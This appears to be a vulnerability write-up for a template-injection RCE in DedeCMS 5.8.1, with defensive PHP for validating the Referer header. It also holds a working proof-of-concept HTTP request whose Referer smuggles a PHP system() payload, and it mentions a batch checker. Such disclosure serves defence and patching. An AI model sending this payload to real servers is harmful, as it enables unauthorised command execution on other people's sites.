DedeCMS (织梦) 5.8.1 RCE vulnerability
The ShowMsg function in include\common.func.php contains a template injection:

    $gourl = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';

The value is read from the Referer header and then rendered by the template engine, which leads to RCE:
    $tpl = new DedeTemplate();
    $tpl->LoadString($msg);
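To make the defensive point concrete, here is an added example (my own code, not DedeCMS's) of how the Referer value should be handled before it gets anywhere near a string that is handed to a template engine. The function, the site host name and the sample inputs are all assumptions constructed for this illustration; nothing here is taken from the DedeCMS source beyond the pattern the post describes.

```php
<?php
// Added example, not DedeCMS code. Validate the Referer before it reaches any
// template or HTML context. Assumes the site is served from $siteHost.

function safeReferer(array $server, string $siteHost, string $fallback = '/'): string
{
    $ref = $server['HTTP_REFERER'] ?? '';
    if ($ref === '') {
        return $fallback;
    }
    // Must parse as an absolute URL at all; a bare PHP/template payload does not.
    if (filter_var($ref, FILTER_VALIDATE_URL) === false) {
        return $fallback;
    }
    $parts = parse_url($ref);
    // Only http(s), and only back to our own host (an open redirect otherwise).
    if (!isset($parts['scheme'], $parts['host'])
        || !in_array(strtolower($parts['scheme']), ['http', 'https'], true)
        || strcasecmp($parts['host'], $siteHost) !== 0) {
        return $fallback;
    }
    // Rebuild the URL from its parsed parts so nothing outside URL grammar
    // survives, then escape it for the HTML context it will be echoed into.
    $clean = $parts['scheme'] . '://' . $parts['host']
        . (isset($parts['port']) ? ':' . $parts['port'] : '')
        . ($parts['path'] ?? '/')
        . (isset($parts['query']) ? '?' . $parts['query'] : '');
    return htmlspecialchars($clean, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed sample inputs (hypothetical host, not a real server).
$samples = [
    ['HTTP_REFERER' => 'http://www.example.test/plus/flink.php?x=1'], // legitimate
    ['HTTP_REFERER' => '<?php "system"($c);die;/*'],                  // pattern from the PoC
    ['HTTP_REFERER' => 'https://evil.example/'],                      // off-site URL
    [],                                                               // header absent
];
foreach ($samples as $s) {
    echo safeReferer($s, 'www.example.test'), PHP_EOL;
}
```

Running this prints the legitimate URL unchanged and `/` for the other three cases. Validation of the header is the secondary fix, though: the root cause is that an attacker-controlled string is concatenated into `$msg` and then passed to `LoadString()`, where the engine treats it as code rather than data. The durable fix is to keep any request-derived value out of the template source entirely and only ever emit it as an escaped variable.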
POC:
    GET /plus/flink.php?dopost=save&c=whoami HTTP/1.1
    Host: 10.211.55.3
    Cookie: PHPSESSID=ferfe1a0k6qd5u9ol5gbd6nieu
    Referer: <?php "system"($c);die;/*
If anyone is lazy, you can just download the ready-made PHP batch checker.